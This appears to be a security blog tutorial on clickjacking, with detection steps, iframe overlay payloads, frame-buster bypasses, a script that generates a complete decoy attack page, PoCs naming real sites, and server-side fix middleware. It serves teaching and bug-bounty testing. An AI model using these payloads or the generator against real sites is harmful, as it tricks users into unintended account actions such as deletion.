Day 15 of 30 Days — 30 Vulnerabilities | ClickJacking

It4chis3c
5 min readAug 18, 2024


Day 15: Mastering ClickJacking Vulnerability — Essential Tricks & Techniques Based on Personal Experience and Valuable POCs

[In collaboration with Abhijeet Kumawat (LinkedIn | Twitter)]

Hey geeks, it4chis3c (Twitter) here with one more write-up on tricks & tips to detect ClickJacking Vulnerability.

1. Brief Description

  • Definition: Clickjacking (also called UI redressing) is a technique in which a user is tricked into clicking something different from what they perceive, so that the click performs an action on another site in the context of the user's own authenticated session.
  • Core Concept: The attacker's page loads the target page in an iframe, makes that frame transparent (or covers most of it with decoy content) and positions it so that the target's real button sits exactly over a visible bait element the user wants to click. The click lands in the frame, and the target site processes it as a legitimate user action.
  • Impact: Unauthorized state-changing actions such as changing account settings, confirming a purchase, following or liking, or deleting an account. Severity depends on what a single click (or drag) can do on the framed page, and on the browser sending the session cookie into a cross-site iframe: Chrome and Edge treat cookies without a SameSite attribute as Lax and do not send them there, so the framed page renders logged out unless the cookie was set with SameSite=None; Secure.

2. Where to Detect

  • High-risk Pages:
    • Settings/Account Management: Pages where one click changes an e-mail address, phone number or privacy setting, or deactivates the account; these give the highest impact.
    • Payment Pages: One-click confirmations of a purchase, transfer or subscription.
    • Login Pages: Commonly reported, but a plain login form gains an attacker little from a misplaced click; the impact is real only where the framed page is already authenticated or the click triggers something on its own (an OAuth consent, "keep me signed in", account linking).
  • Common Targets:
    • Social Media Platforms: Likes, follows, shares, posts and profile changes.
    • E-commerce Sites: Adding items to the cart, confirming orders, changing the delivery address.
    • Banking Websites: Transfer confirmations and beneficiary changes; these usually sit behind extra confirmation steps, so check what a single click can actually complete.

3. How to Detect

  • Manual Testing:
    • Header Check: Whether a page can be framed is decided by response headers, not by its HTML, so inspect the response for X-Frame-Options (DENY or SAMEORIGIN) and a Content-Security-Policy frame-ancestors directive. A frame-busting script in the source is a hint that the developers relied on JavaScript alone, which can be bypassed (section 5).
    • Framing Test: Put the page in an iframe on a page served from a different origin and see whether it renders. Opening a local .html file works for a first look, but repeat it from a real http(s) origin, because SameSite cookie rules only show up in a genuine cross-site context.
    • Interaction Check: Confirm that the framed page is authenticated and that a state-changing action can be completed with one click or drag; that is what decides the severity.
  • Automated Tools:
    • X-Frame-Options Header: Use a header scanner to flag the absence of the header, or an ALLOW-FROM value, which Chrome, Safari and current Firefox ignore (it gives no protection there).
    • Content Security Policy (CSP): Check for a frame-ancestors directive in the enforcing header; when present it overrides X-Frame-Options, and a Content-Security-Policy-Report-Only header blocks nothing.
    • Burp Suite & OWASP ZAP: Burp's scanner reports missing framing protection and Clickbandit builds a clickable PoC; ZAP's passive scan rules flag missing anti-clickjacking headers. Treat these as leads and confirm by hand.
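The precedence rules above are easy to get wrong in a checker (frame-ancestors silently wins over X-Frame-Options, ALLOW-FROM is dead, Report-Only enforces nothing). The following is an added example written for this post, not a tool the author used: it evaluates a set of constructed response headers the way a browser would for a given page origin and attacker origin. The origins and header values are made up.

```javascript
// Added example (not from the original post): decide from a page's response
// headers whether an attacker origin can frame it, the way a browser would.
// The header sets under `samples` are constructed for this example and were
// not captured from any real site.

// Returns the lower-cased source list of the frame-ancestors directive, or
// null when the enforcing CSP header has no such directive. Only the enforcing
// header counts: Content-Security-Policy-Report-Only never blocks framing.
function frameAncestors(cspValue) {
  if (!cspValue) return null;
  for (const directive of cspValue.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0] && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Does one frame-ancestors source expression match the attacker origin?
// Implements the CSP host-source rules that matter here: optional scheme
// ("http:" also matches https), "*." host wildcard (subdomains only) and an
// optional port (absent means only the scheme's default port matches).
function sourceMatches(source, attackerOrigin, pageOrigin) {
  const a = new URL(attackerOrigin);
  const attackerPort = a.port || (a.protocol === 'https:' ? '443' : '80');
  if (source === "'none'") return false;
  if (source === "'self'") return attackerOrigin === pageOrigin;
  if (source === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) {          // scheme-source, e.g. "https:"
    return source === a.protocol || (source === 'http:' && a.protocol === 'https:');
  }
  const m = source.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme) {
    const s = scheme + ':';
    if (s !== a.protocol && !(s === 'http:' && a.protocol === 'https:')) return false;
  }
  if (wildcard ? !a.hostname.endsWith('.' + host) : a.hostname !== host) return false;
  if (port === undefined) return a.port === '';        // no port given: default port only
  return port === '*' || port === attackerPort;
}

// Header names are case-insensitive, so look the name up that way.
function header(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? undefined : headers[key];
}

// Verdict for one page/attacker pair: { framable, reason }.
function assessFraming(headers, pageOrigin, attackerOrigin) {
  const ancestors = frameAncestors(header(headers, 'content-security-policy'));
  if (ancestors !== null) {
    // CSP Level 2: when frame-ancestors is present the browser ignores
    // X-Frame-Options entirely, even a DENY.
    const allowed = ancestors.some((s) => sourceMatches(s, attackerOrigin, pageOrigin));
    return { framable: allowed, reason: `CSP frame-ancestors ${ancestors.join(' ')}` };
  }
  const xfo = (header(headers, 'x-frame-options') || '').trim().toUpperCase();
  if (xfo === 'DENY') return { framable: false, reason: 'X-Frame-Options: DENY' };
  if (xfo === 'SAMEORIGIN') {
    return { framable: attackerOrigin === pageOrigin, reason: 'X-Frame-Options: SAMEORIGIN' };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    return { framable: true, reason: 'X-Frame-Options: ALLOW-FROM is ignored by Chrome, Safari and current Firefox' };
  }
  if (xfo) return { framable: true, reason: `unrecognised X-Frame-Options value "${xfo}" is ignored` };
  return { framable: true, reason: 'no X-Frame-Options and no frame-ancestors directive' };
}

// Constructed sample responses (placeholder origins, not real sites).
const PAGE = 'https://victim.example';
const samples = {
  noHeaders: {},
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  allowFrom: { 'x-frame-options': 'ALLOW-FROM https://partner.example' },
  cspSelf: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'" },
  cspBeatsXfo: {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'self' https://*.partner.example",
  },
  reportOnly: { 'Content-Security-Policy-Report-Only': "frame-ancestors 'none'" },
};

for (const [name, headers] of Object.entries(samples)) {
  const v = assessFraming(headers, PAGE, 'https://attacker.example');
  console.log(`${name.padEnd(12)} framable=${v.framable}  (${v.reason})`);
}
```

To use it against a live target, feed it the headers of the exact response you want to frame (redirect targets and error pages often carry different headers than the final page), with the page origin and the origin your PoC will be served from.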

4. Basic & Advanced Payloads

Basic Payloads:

  • Transparent Iframe (the frame covers the page, is invisible, and sits on top, so it receives the user's clicks while the bait underneath is what they see):
<iframe src="https://victim.com" style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%; z-index:2;"></iframe>
  • Bait Button (the visible element on the attacker's page, placed under the transparent frame so that it lines up with the target's real button; it must not be hidden, or there is nothing for the user to aim at):
<button style="position:absolute; top:0; left:0; z-index:1;">Click Me!</button>

Advanced Payloads:

  • Double Framing (nested iframes): the attacker's outer page frames a second attacker-controlled page, which frames the victim. This defeats frame busters that set parent.location, because the victim's parent is no longer the top window and browsers do not let a cross-origin child navigate an ancestor that is not the top. An iframe tag written inside another iframe tag is treated as fallback text and never loads, so the inner frame has to live in the intermediate page:
<!-- outer.html on attackersite.com -->
<iframe src="https://attackersite.com/inner.html" style="border:0; width:100%; height:100%;"></iframe>
<!-- inner.html on attackersite.com -->
<iframe src="https://victim.com" style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%;"></iframe>
  • JavaScript-based Clickjacking (the same frame injected at runtime, so it can be added after the decoy is drawn or positioned from script; insertAdjacentHTML is used rather than innerHTML +=, which re-parses the whole body and drops existing event handlers):
document.body.insertAdjacentHTML('beforeend', '<iframe src="https://victim.com" style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%;"></iframe>');

5. Defense Bypass Techniques

  • Clickjacking using JavaScript:
    • Overlay Deception: Keep the target frame transparent and draw a decoy layout underneath that matches it, so whatever the user believes they are clicking coincides with the target's real control. Aligning with opacity around 0.5 and then dropping it to 0 for the final page is the usual workflow.
    • Script-based Click Execution: Script on the attacker page cannot click into a cross-origin frame or read its contents; the user has to supply the click. What script can do is track the mouse and keep moving the frame so the target's button is always under the cursor, and watch for the top window losing focus as a sign that the click went into the frame.
  • Advanced Framing Techniques:
    • Frame Busting Circumvention: Only JavaScript busters can be bypassed; X-Frame-Options and frame-ancestors are enforced by the browser before the page's script runs, and nothing on the attacker side defeats them. Against script: sandbox="allow-forms allow-scripts" without allow-top-navigation makes top.location = self.location throw inside the frame, and double framing (section 4) defeats busters that navigate parent.location.
    • UI Redressing: Any arrangement in which the user's intended interaction lands on the hidden target: partial overlays that leave only one control exposed, cursor-following frames, and drag-and-drop variants in which the user drags attacker-supplied text into a form field of the framed page.
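To make the payloads and bypass notes above concrete, here is an added example (written for this post, not code from the original) that generates the attacker-side decoy page: a visible bait button with the target page laid transparently over it, shifted so the target's real button sits exactly on the bait, and sandboxed so a JavaScript frame buster cannot escape. The target URL, button coordinates, label and frame size are placeholder assumptions to be calibrated against the real page.

```javascript
// Added example (not from the original post): generate the attacker-side decoy
// page for a clickjacking PoC. The target URL, the coordinates of the button
// inside the target page and the bait label are placeholders that you calibrate
// against the real page before use.

// Escape a string for safe inclusion inside HTML text or a double-quoted attribute.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Where to place the iframe so that the target's real button (at targetButton.x/y
// inside the framed document) lands exactly over the bait drawn at decoy.x/y.
function frameOffset(decoy, targetButton) {
  return { left: decoy.x - targetButton.x, top: decoy.y - targetButton.y };
}

function buildClickjackPoc({
  target,                        // page to frame, e.g. 'https://victim.example/settings'
  targetButton,                  // { x, y, w, h } of the real button inside that page
  decoy = { x: 40, y: 40 },      // where the visible bait sits on our page
  label = 'Claim your prize',    // bait text the victim believes they are clicking
  opacity = 0,                   // raise to 0.5 while aligning, back to 0 for the PoC
  bustFrameBusters = true,       // sandbox the frame so JS frame busters cannot escape
  frameSize = { w: 1280, h: 900 },
}) {
  const url = new URL(target);
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    throw new Error('target must be an http(s) URL');
  }
  const off = frameOffset(decoy, targetButton);
  // allow-forms and allow-scripts keep the target usable; leaving out
  // allow-top-navigation means "top.location = self.location" in the target
  // throws instead of breaking out of the frame. allow-same-origin keeps the
  // target's own origin so its cookie-backed XHR/fetch calls still behave.
  const sandbox = bustFrameBusters ? ' sandbox="allow-forms allow-scripts allow-same-origin"' : '';
  return `<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>PoC</title>
<style>
  body { margin: 0; font-family: sans-serif; }
  /* Visible bait: drawn under the frame, sized like the real button. */
  #decoy { position: absolute; left: ${decoy.x}px; top: ${decoy.y}px;
           width: ${targetButton.w}px; height: ${targetButton.h}px; z-index: 1; }
  /* The real page: shifted so its button covers the bait, transparent and on
     top, so the click the user aims at the bait actually lands on the target. */
  #target { position: absolute; left: ${off.left}px; top: ${off.top}px;
            width: ${frameSize.w}px; height: ${frameSize.h}px; border: 0;
            opacity: ${opacity}; z-index: 2; }
</style>
</head>
<body>
<button id="decoy">${escapeHtml(label)}</button>
<iframe id="target" src="${escapeHtml(url.href)}"${sandbox}></iframe>
</body>
</html>
`;
}

// Constructed example values; nothing here points at a real target.
const pocHtml = buildClickjackPoc({
  target: 'https://victim.example/account/delete',
  targetButton: { x: 300, y: 500, w: 120, h: 40 },
});
console.log(pocHtml);
```

Serve the output from an http(s) origin rather than opening it as a file, and check that the framed page is actually logged in: in Chrome and Edge, cookies without a SameSite attribute are treated as Lax and are not sent into a cross-site iframe, so a target that only sets such cookies renders logged out, and what you have is a missing-header finding rather than a one-click account action.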

6. POC (Proof of Concept)

POC 1: Clickjacking on cas.acronis.com Login Page

A. Description:

  • The login page of cas.acronis.com could be loaded in an iframe from a foreign origin because the response did not restrict framing. The PoC below only frames the page, which is enough to show the missing protection; an attack would add the transparent overlay and bait from section 4 to trick the user into performing an unintended action.

B. Steps to Reproduce:

  • Create a new HTML file with the following source code:
<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>I Frame</title>
</head>
<body>
<h2>Clickjacking Vulnerability</h2>
<iframe src="https://cas.acronis.com/" frameborder="0" height="700px" width="850px"></iframe>
</body>
</html>
  • Save the file as whatever.html.
  • Open the document in a browser.

C. Impact:

  • The attacker may trick the user into clicking on an image, leading to their account being deactivated without their knowledge.

D. Fix:

  • The vulnerability can be mitigated by adding frame-ancestors 'self'; to the Content-Security-Policy header, with X-Frame-Options: SAMEORIGIN as a fallback for browsers that do not support that directive.

POC 2: Twitter Periscope Clickjacking Vulnerability

A. Description:

  • Clickjacking was possible on a Twitter Periscope subdomain because the page relied on X-Frame-Options: ALLOW-FROM, which only Internet Explorer and older Firefox versions honor; Chrome, Safari and current Firefox ignore the header entirely, leaving the page framable there.

B. Steps to Reproduce:

  • Create a new HTML file and include the following code:
<iframe src="https://vulnerable.site" frameborder="0"></iframe>
  • Save the file.
  • Open the document in a browser.

C. Impact:

  • The attacker may trick the user into clicking on an image, leading to their account being deactivated without their knowledge.

Solution:

  • Adding frame-ancestors 'self'; to the Content-Security-Policy header mitigates the vulnerability in every browser that supports the directive; keep X-Frame-Options: SAMEORIGIN as the fallback and drop ALLOW-FROM.

POC 3: RCE of Burp Scanner/Crawler via Clickjacking

A. Description:

  • A combination of clickjacking and XSS vulnerabilities was used to execute Remote Code Execution (RCE) on the Burp Suite scanner/crawler.

B. Steps to Reproduce:

  • Download the attached ‘burp.html’ exploit, and host it on a web server (e.g., python -m http.server).
  • Launch an instance of Burp Suite and start a new scan of the web server.
  • Open a Chrome browser and navigate to the hosted exploit page (e.g., http://127.0.0.1:8000/burp.html).
  • Observe that a JavaScript port scanner identifies the port listening for Chrome remote debugging. A clickjacking payload is then rendered.
  • Click the ‘CLICK ME!!!’ button, restart Burp Suite, and observe that the Calculator app has been launched.

C. Impact:

  • Successful exploitation allows an attacker to gain control over the victim’s computer with the same permissions as the user running the scanner.

POC 4: Highly Wormable Clickjacking in Player Card

A. Description:

  • The Player Card on Twitter was vulnerable to clickjacking, allowing attackers to perform click-based critical actions such as retweets and follows without user consent.

B. Steps to Reproduce:

  • Clone the Player Card starter bundle from GitHub.
  • Change the card’s property twitter:player to a custom HTML file.
  • In the HTML file, embed an iframe to a Twitter page (e.g., <iframe src="//twitter.com"></iframe>).
  • Post the link in a Tweet (ensure the domain is white-listed).
  • Expand the tweet in Safari or IE; it will show that a Twitter page is embedded.

C. Impact:

  • The attack can be wormable, allowing the attacker to make victims tweet arbitrary content, perform click-based critical actions, and spread the attack.

7. Conclusion

Summary: Clickjacking exploits the gap between what the user sees and where the browser delivers the click. Severity ranges from informational (a framable page with nothing worth clicking) to critical (a one-click account change, payment or takeover), so rate each finding by the action a framed click can actually complete in the victim's session.

Preventative Measures:

  • X-Frame-Options Header: Send X-Frame-Options: DENY (or SAMEORIGIN if the site frames its own pages) on every response. Do not use ALLOW-FROM; it is obsolete and ignored by current browsers.
  • Content Security Policy (CSP): Send a frame-ancestors directive ('none', 'self', or an explicit list of origins) in the enforcing Content-Security-Policy header. It is the only way to allow named third-party framers, and browsers that support it ignore X-Frame-Options when it is present, so keep the two consistent.
  • Regular Security Audits: Re-check the headers after every deployment, especially on new subdomains, reverse proxies and error pages, where they are most often dropped; JavaScript frame busting on its own is not a fix.
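As an added example of the preventative measures above (written for this post, not code from any project or site named here), the following middleware sets both headers, merges frame-ancestors into a Content-Security-Policy the application may already send, and refuses malformed origins so that a bad configuration value cannot rewrite the rest of the policy. The partner origin and the Express-style (req, res, next) shape are assumptions; no framework is required to run it.

```javascript
// Added example (not from the original post): the server-side fix, written as a
// plain (req, res, next) middleware so it needs no framework install. Express
// users can pass it to app.use(); the partner origin below is a placeholder.

const HTTPS_ORIGIN = /^https:\/\/[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?(?::\d{1,5})?$/i;

// Build the frame-ancestors source list from a simple allow list:
//   []                                  -> nobody may frame the page
//   ['self']                            -> only the page's own origin
//   ['self', 'https://partner.example'] -> own origin plus one named partner
// Every entry is validated, so a value taken from configuration cannot smuggle
// in ';' or whitespace and thereby add or alter other CSP directives.
function ancestorSources(allowed) {
  const sources = allowed.map((a) => {
    if (a === 'self') return "'self'";
    if (HTTPS_ORIGIN.test(a)) return a.toLowerCase();
    throw new Error(`refusing unsafe frame-ancestors source: ${a}`);
  });
  return sources.length ? sources.join(' ') : "'none'";
}

// Merge frame-ancestors into an existing CSP without clobbering the other
// directives the app already sends; replaces any frame-ancestors already there.
function withFrameAncestors(existingCsp, sources) {
  const kept = (existingCsp || '')
    .split(';')
    .map((d) => d.trim())
    .filter((d) => d && !/^frame-ancestors\b/i.test(d));
  kept.push(`frame-ancestors ${sources}`);
  return kept.join('; ');
}

// X-Frame-Options is only a fallback for browsers without CSP2 support and can
// express just DENY or SAMEORIGIN (ALLOW-FROM is obsolete). When third-party
// origins are allowed, SAMEORIGIN is the safest value it can carry; browsers
// that understand frame-ancestors ignore X-Frame-Options anyway.
function xfoFallback(allowed) {
  return allowed.length === 0 ? 'DENY' : 'SAMEORIGIN';
}

function antiClickjacking(allowed = []) {
  const sources = ancestorSources(allowed);   // fail at startup, not per request
  const xfo = xfoFallback(allowed);
  return function (req, res, next) {
    res.setHeader('Content-Security-Policy',
      withFrameAncestors(res.getHeader('Content-Security-Policy'), sources));
    res.setHeader('X-Frame-Options', xfo);
    next();
  };
}

// Minimal stand-in for an Express response, so the middleware can be exercised
// here without a server.
function fakeResponse(initialHeaders = {}) {
  const headers = { ...initialHeaders };
  return {
    headers,
    getHeader: (n) => headers[n],
    setHeader: (n, v) => { headers[n] = v; },
  };
}

// Constructed demo: an app that already sends a CSP with a permissive
// frame-ancestors, tightened to self plus a placeholder partner origin.
const res = fakeResponse({ 'Content-Security-Policy': "default-src 'self'; frame-ancestors *" });
antiClickjacking(['self', 'https://partner.example'])({}, res, () => {});
console.log(res.headers);
```

Register the middleware before any route handler and before anything that writes headers itself, and apply it to error pages and static files as well; a single unprotected endpoint that carries the session cookie is enough for an attacker to frame.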

Final Thoughts: By understanding the methods and implementing the proper defenses, web developers can protect their users and applications from clickjacking attacks.

…………………………………………………………………………………………………

Thank you for reading the blog!!!

You can also follow me on Twitter & LinkedIn for more write-ups

Follow & subscribe for daily write-up updates via mail on Medium

Stay tuned for Day 16, where we’ll dive into another vulnerability!

…………………………………………………………………………………………………
